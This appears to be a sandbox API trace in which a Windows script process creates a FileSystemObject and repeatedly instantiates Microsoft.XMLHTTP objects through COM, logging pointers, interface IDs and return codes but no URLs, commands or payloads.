	[0662.577] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0662.577] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0662.577] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0662.577] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0662.577] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0666.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0666.457] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0666.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0666.458] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.458] SysStringLen (param_1=0x0) returned 0x0
	[0666.458] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.459] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0666.459] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0666.459] ??2@YAPEAX_K@Z () returned 0x62f310
	[0666.459] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0666.459] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.459] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0666.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0666.459] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0666.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.459] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.462] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.462] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.462] SysStringLen (param_1=0x0) returned 0x0
	[0666.462] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.462] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.462] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0666.462] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.462] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0666.463] ??2@YAPEAX_K@Z () returned 0x62f330
	[0666.463] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0666.463] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.463] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0666.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0666.463] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0666.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.463] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.463] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.463] SysStringLen (param_1=0x0) returned 0x0
	[0666.463] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.464] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0666.464] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0666.464] ??2@YAPEAX_K@Z () returned 0x62f310
	[0666.464] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0666.464] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.464] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0666.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0666.464] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0666.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.464] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.465] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.465] SysStringLen (param_1=0x0) returned 0x0
	[0666.465] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.465] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0666.465] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0666.465] ??2@YAPEAX_K@Z () returned 0x62f330
	[0666.465] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0666.465] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.465] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0666.466] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0666.466] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0666.466] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.466] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.466] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.466] longjmp () 
	[0666.466] longjmp () 
	[0666.466] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.466] SysStringLen (param_1=0x0) returned 0x0
	[0666.467] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.467] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0666.467] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0666.467] ??2@YAPEAX_K@Z () returned 0x62f310
	[0666.467] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0666.467] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.467] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0666.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0666.467] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0666.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.468] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.468] longjmp () 
	[0666.468] longjmp () 
	[0666.468] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0666.468] SysStringLen (param_1=0x0) returned 0x0
	[0666.468] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0666.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0666.468] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0666.468] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0666.469] ??2@YAPEAX_K@Z () returned 0x62f330
	[0666.469] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0666.469] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0666.469] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
